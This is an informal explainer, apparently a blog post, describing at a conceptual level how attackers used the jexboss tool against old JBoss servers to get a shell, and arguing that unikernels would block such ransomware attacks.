Understanding Ransomware

Intro

I wanted to talk a little bit about the latest ransomware going around.

Some people think that data breaches and getting hacked is inevitable - but the truth is "Hackers aren’t acts of god - they’re just assholes."

So I wanted to show you how these hackers actually work.

Mr. hacker first identifies a vulnerable piece of software.

In this case he picks on jboss which isn’t even the name of the software anymore - which tells you how old this particular installation is.

He then scans the internet looking for vulnerable servers - finds a few and gets lucky.

In hacker parlance we call this process banner-grabbing.

From then on it’s relatively straight forward for him to attack and it can happen in minutes. Let’s dissect those few minutes though because they are super important.

This particular attack was using a program called jexboss.

You can actually find this on github - you know the company microsoft just bought for 7.5B dollars?

WHAT’S A SHELL?

The exploit will at first try to launch what is called a shell.

The shell is the little black box you might see a developer staring at all day.

The shell allows the attacker to do a few things:

• Download new software to help him in his attack.
• Run other programs on that system that aren’t intended to run.
• Serve as a launching platform to attack other systems on the ‘trusted’ network.

The reason he can do all of this is because the operating systems we use today - namely windows and linux are designed to run multiple programs for multiple users.

This is all fine for end-users on laptops and phones but is absolutely not what we want in a server environment. Indeed developers go out of their way to isolate programs from each other in server environments as is.

Point 2 is a major problem though - why would you let an attacker run his software on your computer to begin with? What went wrong? Why is this even possible?

HISTORY

For that we have to rewind almost 50 years. The general purpose operating systems we use today use the same operating system characteristics that were built for very old computers like the pdp-7 and pdp-11. These systems were designed for multiple users and by proxy multiple programs.

The machines were just too damn big and too damn expensive. They had to run multiple programs.

Fast forward almost 50 years to today and developers go out of their way to isolate programs from each other - mainly because of manageability reasons - they’re used to working with tens to hundreds or even thousands of virtual machines.

The key part here though is virtual. You see - in today’s world whether you are public cloud, private cloud, or somewhere in between with hybrid you probably have a lot of virtualized servers.

AHA

So we don’t need this concept of one server running all of the software for multiple people on one machine - you simply can’t do that anymore even if you wanted to - there’s too much.

Unikernels prevent ransomware attacks like this. Unikernels run one application in one VM with no general purpose operating system like linux or windows.

There is no way to pop into the host. There is no concept of users. There is no shell. There isn’t even a way to spawn a shell because the system simply doesn’t have the facilities to do so.

It’s like having a house instead of an apartment complex.

What’s really interesting is that you could forklift a completely vulnerable JBoss application into a unikernel and you don’t have to deal with patch management time and cost. Keeping your software up to date is definitely best practices but let’s face reality - you’re too busy, there’s too much software and you just don’t know what’s out there.

Unikernels don’t stop all security problems but they do stop ransomware attacks like this and they do stop assholes.